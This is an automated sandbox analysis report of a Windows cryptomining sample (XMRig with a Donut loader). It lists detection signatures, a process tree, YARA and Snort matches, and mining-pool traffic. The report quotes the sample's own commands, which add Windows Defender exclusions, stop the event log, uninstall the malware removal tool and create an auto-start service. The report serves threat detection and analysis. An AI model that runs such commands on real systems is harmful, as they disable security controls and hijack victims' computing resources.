Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1458484
MD5:b99383ade7723a2376ac12d1ff516aa6
SHA1:5298425d67725856a9bd85104b5b585b306f2b53
SHA256:13a78b0cac6ce349e4dbfeb770d7c77d598b0ed1c688e7cf915d2f931cd58bf7
Tags:exe
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop EventLog
Snort IDS alert for network traffic
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Detected Stratum mining protocol
Found direct / indirect Syscall (likely to bypass EDR)
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 4340 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B99383ADE7723A2376AC12D1FF516AA6)
    • conhost.exe (PID: 3784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • notepad.exe (PID: 1280 cmdline: notepad.exe MD5: 27F71B12CB585541885A31BE22F61C83)
    • powershell.exe (PID: 3196 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6528 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 6272 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 2760 cmdline: C:\Windows\system32\sc.exe delete "MXOLIHZI" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4996 cmdline: C:\Windows\system32\sc.exe create "MXOLIHZI" binpath= "C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3768 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2580 cmdline: C:\Windows\system32\sc.exe start "MXOLIHZI" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • nlkuzmdacjrb.exe (PID: 5608 cmdline: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe MD5: B99383ADE7723A2376AC12D1FF516AA6)
    • notepad.exe (PID: 1208 cmdline: notepad.exe MD5: 27F71B12CB585541885A31BE22F61C83)
    • powershell.exe (PID: 4904 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6804 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 3260 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • conhost.exe (PID: 504 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 2120 cmdline: conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000012.00000002.2251660159.00000122A4359000.00000004.00000001.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
    • 0x28e7d1:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
    00000000.00000002.2226259589.000001BB80000000.00000020.00000001.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
    • 0x28e791:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
    00000000.00000002.2226502800.000001BB802AB000.00000004.00000001.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
    • 0x28e7d1:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
    00000012.00000002.2251423159.00000122A40B0000.00000020.00000001.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
    • 0x28e791:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
    0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      Click to see the 3 entries
      SourceRuleDescriptionAuthorStrings
      26.2.conhost.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        26.2.conhost.exe.140000000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
        • 0x37ef98:$a1: mining.set_target
        • 0x371220:$a2: XMRIG_HOSTNAME
        • 0x373b48:$a3: Usage: xmrig [OPTIONS]
        • 0x3711f8:$a4: XMRIG_VERSION
        26.2.conhost.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
        • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
        26.2.conhost.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
        • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
        • 0x3cd180:$s3: \\.\WinRing0_
        • 0x376148:$s4: pool_wallet
        • 0x3705f0:$s5: cryptonight
        • 0x370600:$s5: cryptonight
        • 0x370610:$s5: cryptonight
        • 0x370620:$s5: cryptonight
        • 0x370638:$s5: cryptonight
        • 0x370648:$s5: cryptonight
        • 0x370658:$s5: cryptonight
        • 0x370670:$s5: cryptonight
        • 0x370680:$s5: cryptonight
        • 0x370698:$s5: cryptonight
        • 0x3706b0:$s5: cryptonight
        • 0x3706c0:$s5: cryptonight
        • 0x3706d0:$s5: cryptonight
        • 0x3706e0:$s5: cryptonight
        • 0x3706f8:$s5: cryptonight
        • 0x370710:$s5: cryptonight
        • 0x370720:$s5: cryptonight
        • 0x370730:$s5: cryptonight

        System Summary

        barindex
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4340, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 3196, ProcessName: powershell.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4340, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 3196, ProcessName: powershell.exe
        Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "MXOLIHZI" binpath= "C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "MXOLIHZI" binpath= "C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4340, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "MXOLIHZI" binpath= "C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe" start= "auto", ProcessId: 4996, ProcessName: sc.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4340, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 3196, ProcessName: powershell.exe

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4340, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 3768, ProcessName: sc.exe
        Timestamp:06/17/24-18:15:13.266118
        SID:2036289
        Source Port:62460
        Destination Port:53
        Protocol:UDP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeReversingLabs: Detection: 44%
        Source: file.exeReversingLabs: Detection: 44%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeJoe Sandbox ML: detected
        Source: file.exeJoe Sandbox ML: detected

        Bitcoin Miner

        barindex
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 26.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 2120, type: MEMORYSTR
        Source: global trafficTCP traffic: 192.168.2.6:49717 -> 45.76.89.70:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4agh8zkebtmi6nakn8kytbecuawowbajkj6vedxzmsipjtkywtf1hhadafjn39jtrsxipbhsszqnt2u1jycpsaedmhft2qq","pass":"","agent":"xmrig/6.19.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
        Source: conhost.exe, 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
        Source: conhost.exeString found in binary or memory: cryptonight-monerov7
        Source: conhost.exe, 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
        Source: conhost.exe, 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
        Source: conhost.exe, 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
        Source: conhost.exe, 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
        Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: nlkuzmdacjrb.exe, 00000012.00000003.2250221421.00000122A48C0000.00000004.00000001.00020000.00000000.sdmp, gtebvdararzg.sys.18.dr
        Source: Binary string: ad.pdb" source: file.exe, nlkuzmdacjrb.exe.0.dr
        Source: Binary string: ad.pdb source: file.exe, nlkuzmdacjrb.exe.0.dr

        Networking

        barindex
        Source: TrafficSnort IDS: 2036289 ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) 192.168.2.6:62460 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.6:49717 -> 45.76.89.70:3333
        Source: Joe Sandbox ViewIP Address: 45.76.89.70 45.76.89.70
        Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: pool.hashvault.pro
        Source: nlkuzmdacjrb.exe, 00000012.00000003.2250221421.00000122A48C0000.00000004.00000001.00020000.00000000.sdmp, gtebvdararzg.sys.18.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
        Source: nlkuzmdacjrb.exe, 00000012.00000003.2250221421.00000122A48C0000.00000004.00000001.00020000.00000000.sdmp, gtebvdararzg.sys.18.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
        Source: nlkuzmdacjrb.exe, 00000012.00000003.2250221421.00000122A48C0000.00000004.00000001.00020000.00000000.sdmp, gtebvdararzg.sys.18.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
        Source: nlkuzmdacjrb.exe, 00000012.00000003.2250221421.00000122A48C0000.00000004.00000001.00020000.00000000.sdmp, gtebvdararzg.sys.18.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
        Source: conhost.exe, 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://172.94.1q
        Source: conhost.exe, 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms

        System Summary

        barindex
        Source: 26.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 26.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
        Source: 26.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
        Source: 00000012.00000002.2251660159.00000122A4359000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
        Source: 00000000.00000002.2226259589.000001BB80000000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
        Source: 00000000.00000002.2226502800.000001BB802AB000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
        Source: 00000012.00000002.2251423159.00000122A40B0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
        Source: 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: Process Memory Space: conhost.exe PID: 2120, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: C:\Windows\System32\conhost.exeProcess Stats: CPU usage > 49%
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72877D4A0 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,0_2_00007FF72877D4A0
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000001BB80981394 NtEnumerateValueKey,0_2_000001BB80981394
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: 18_2_00007FF63B54D4A0 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,18_2_00007FF63B54D4A0
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: 18_2_00000122A4921394 NtQuerySecurityObject,18_2_00000122A4921394
        Source: C:\Windows\System32\conhost.exeCode function: 23_2_0000000140001394 NtDeleteWnfStateName,23_2_0000000140001394
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeFile created: C:\Windows\TEMP\gtebvdararzg.sysJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_1ksoiwsx.q32.ps1
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7287711B00_2_00007FF7287711B0
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF728771DEC0_2_00007FF728771DEC
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7287741670_2_00007FF728774167
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7287875800_2_00007FF728787580
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF728781EF00_2_00007FF728781EF0
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF728785F000_2_00007FF728785F00
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7287747BA0_2_00007FF7287747BA
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7287713F30_2_00007FF7287713F3
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7287713FA0_2_00007FF7287713FA
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7287714010_2_00007FF728771401
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7287714080_2_00007FF728771408
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72877FC100_2_00007FF72877FC10
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7287787400_2_00007FF728778740
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7287713500_2_00007FF728771350
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72878AB900_2_00007FF72878AB90
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7287884A00_2_00007FF7287884A0
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7287738E10_2_00007FF7287738E1
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000001BB80983B500_2_000001BB80983B50
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: 18_2_00007FF63B5584A018_2_00007FF63B5584A0
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: 18_2_00007FF63B5438E118_2_00007FF63B5438E1
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: 18_2_00007FF63B55AB9018_2_00007FF63B55AB90
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: 18_2_00007FF63B54874018_2_00007FF63B548740
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: 18_2_00007FF63B54135018_2_00007FF63B541350
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: 18_2_00007FF63B5413FA18_2_00007FF63B5413FA
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: 18_2_00007FF63B54140118_2_00007FF63B541401
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: 18_2_00007FF63B54140818_2_00007FF63B541408
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: 18_2_00007FF63B54FC1018_2_00007FF63B54FC10
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: 18_2_00007FF63B5413F318_2_00007FF63B5413F3
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: 18_2_00007FF63B5447BA18_2_00007FF63B5447BA
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: 18_2_00007FF63B555F0018_2_00007FF63B555F00
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: 18_2_00007FF63B551EF018_2_00007FF63B551EF0
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: 18_2_00007FF63B5411B018_2_00007FF63B5411B0
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: 18_2_00007FF63B55758018_2_00007FF63B557580
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: 18_2_00007FF63B54416718_2_00007FF63B544167
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: 18_2_00007FF63B541DEC18_2_00007FF63B541DEC
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: 18_2_00000122A4923B5018_2_00000122A4923B50
        Source: C:\Windows\System32\conhost.exeCode function: 23_2_000000014000315023_2_0000000140003150
        Source: C:\Windows\System32\conhost.exeCode function: 23_2_00000001400026E023_2_00000001400026E0
        Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\gtebvdararzg.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: String function: 00007FF63B55A3D0 appears 69 times
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: String function: 00000122A4921394 appears 33 times
        Source: C:\Users\user\Desktop\file.exeCode function: String function: 00007FF72878A3D0 appears 69 times
        Source: C:\Users\user\Desktop\file.exeCode function: String function: 000001BB80981394 appears 33 times
        Source: 26.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 26.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
        Source: 26.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
        Source: 00000012.00000002.2251660159.00000122A4359000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
        Source: 00000000.00000002.2226259589.000001BB80000000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
        Source: 00000000.00000002.2226502800.000001BB802AB000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
